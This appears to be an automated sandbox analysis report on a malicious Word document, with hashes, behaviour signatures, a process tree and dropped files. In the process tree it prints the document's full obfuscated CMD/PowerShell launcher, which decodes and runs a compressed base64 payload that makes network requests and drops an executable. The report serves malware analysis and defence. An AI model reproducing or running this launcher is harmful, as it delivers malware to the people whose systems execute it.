Analysis

  • max time kernel
    141s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-05-2024 02:14

General

  • Target

    37b81642b0e432f46480033814f85b6a_JaffaCakes118.doc

  • Size

    76KB

  • MD5

    37b81642b0e432f46480033814f85b6a

  • SHA1

    3de2f1dc9cd31bcb680f7d9ae43169d7f851672b

  • SHA256

    1aa38e81fe2944358f41c7afa56a4aacbdf1bc6933951219a168f49b3f64c498

  • SHA512

    1b9a2cf4ceddb5b114ce49cdf1c756eebafc04c1f87cbf30b74b3ac779babbdf71314ed26a80af29bc3c5bafeb7e35d4ac422dd1b8114c2051d5d2832a95d366

  • SSDEEP

    768:aDVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9YXxrHZPn6ff9dRUy:aDocn1kp59gxBK85fBt+a9YhlncjR

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\37b81642b0e432f46480033814f85b6a_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4620
    • C:\Windows\SYSTEM32\CMD.exe
      CMD c:\wIndows\sYSteM32\CmD /C "sET djCFB= ( New-ObJecT sysTEm.io.comPREssIoN.dEfLATEStREaM( [iO.MemOrYSTReAm][COnVErt]::fromBASe64STRInG('NZBda8IwFED/Sh8CUZzpw9SpoaDo3MThx2QMx15qvFvSpklJUmMV//tama/3nHvgXrRMNpEC39b7BJgLluDIJ+wnUoByFJ3P7xHmzuXDMLSuyEGJNLPEFOF0N/kY/652q9E/9t4TXqgUJJhaeO68dcZldjrcBVutm1zkUNPuygzmvfGdcQmWF86BsUTJ0MvHDbPJ11rcBaPLWFpghRGuFIoRprNw0X9Si+1ggck2l8I18Ag3KTrydRAFuNftYIqSFx8hUMehgyxv4W/cqnkLEzgBpj/aQMx4A73OkkCooL63eXGmvKDqL2SqvZI6PsyEhJvzENTBJp2ro06hPa+itwndV52UXlnsGL9cr38=') ,[SysTeM.IO.COmprEsSion.comprEssIoNmodE]::DecOMPresS)^|ForEaCh {New-ObJecT iO.sTReamReADeR($_, [SYstEM.TEXT.EncoDING]::AScII) }^| FoReACh{$_.REaDToEND() } )^| ^&( $eNV:comSpeC[4,24,25]-JOIN'')&& powERsHEll ( ^& ( \"{1}{0}\"-f 'TeM','i') ( \"{0}{1}{2}\" -f 'ENv:dj','c','Fb' ) ).\"va`LUe\" ^| .(( ^& ( 'gv') (\"{0}{1}\" -f'*Md','r*' ) ).\"N`AMe\"[3,11,2]-joIn'' )"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:5484
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powERsHEll ( & ( \"{1}{0}\"-f 'TeM','i') ( \"{0}{1}{2}\" -f 'ENv:dj','c','Fb' ) ).\"va`LUe\" | .(( & ( 'gv') (\"{0}{1}\" -f'*Md','r*' ) ).\"N`AMe\"[3,11,2]-joIn'' )
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1584
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5136 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:2036

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\654.exe

      Filesize

      16KB

      MD5

      262e973d8ea75e48ea2e1d9d0ff5d052

      SHA1

      efe1871ddff26141415eef3b81e8c0c273ce0a0a

      SHA256

      1071629ba60d33c8d55d8ae35540ccfa9d3373e377034f3ffdda7873d02d74a0

      SHA512

      7c94c22b8fb936d620a48b9b64b1fbbb1e87800d9eccd7367b51e7db4f6fd8462d7b11bfaae10d28422b9d2e235ab09c1cf68c7289c7a4083230f7f3f099cb2a

    • C:\Users\Admin\AppData\Local\Temp\654.exe

      Filesize

      114B

      MD5

      e89f75f918dbdcee28604d4e09dd71d7

      SHA1

      f9d9055e9878723a12063b47d4a1a5f58c3eb1e9

      SHA256

      6dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023

      SHA512

      8df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4axu00to.vlw.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1584-43-0x000001D77FFE0000-0x000001D780002000-memory.dmp

      Filesize

      136KB

    • memory/4620-37-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4620-1-0x00007FFD62A90000-0x00007FFD62AA0000-memory.dmp

      Filesize

      64KB

    • memory/4620-10-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4620-11-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4620-8-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4620-3-0x00007FFD62A90000-0x00007FFD62AA0000-memory.dmp

      Filesize

      64KB

    • memory/4620-2-0x00007FFD62A90000-0x00007FFD62AA0000-memory.dmp

      Filesize

      64KB

    • memory/4620-0-0x00007FFD62A90000-0x00007FFD62AA0000-memory.dmp

      Filesize

      64KB

    • memory/4620-12-0x00007FFD60A30000-0x00007FFD60A40000-memory.dmp

      Filesize

      64KB

    • memory/4620-14-0x00007FFD60A30000-0x00007FFD60A40000-memory.dmp

      Filesize

      64KB

    • memory/4620-32-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4620-36-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4620-4-0x00007FFDA2AAD000-0x00007FFDA2AAE000-memory.dmp

      Filesize

      4KB

    • memory/4620-9-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4620-5-0x00007FFD62A90000-0x00007FFD62AA0000-memory.dmp

      Filesize

      64KB

    • memory/4620-48-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4620-50-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4620-49-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4620-53-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4620-55-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4620-56-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4620-6-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4620-7-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

      Filesize

      2.0MB

    • memory/4620-97-0x00007FFD62A90000-0x00007FFD62AA0000-memory.dmp

      Filesize

      64KB

    • memory/4620-98-0x00007FFD62A90000-0x00007FFD62AA0000-memory.dmp

      Filesize

      64KB

    • memory/4620-100-0x00007FFD62A90000-0x00007FFD62AA0000-memory.dmp

      Filesize

      64KB

    • memory/4620-99-0x00007FFD62A90000-0x00007FFD62AA0000-memory.dmp

      Filesize

      64KB

    • memory/4620-101-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

      Filesize

      2.0MB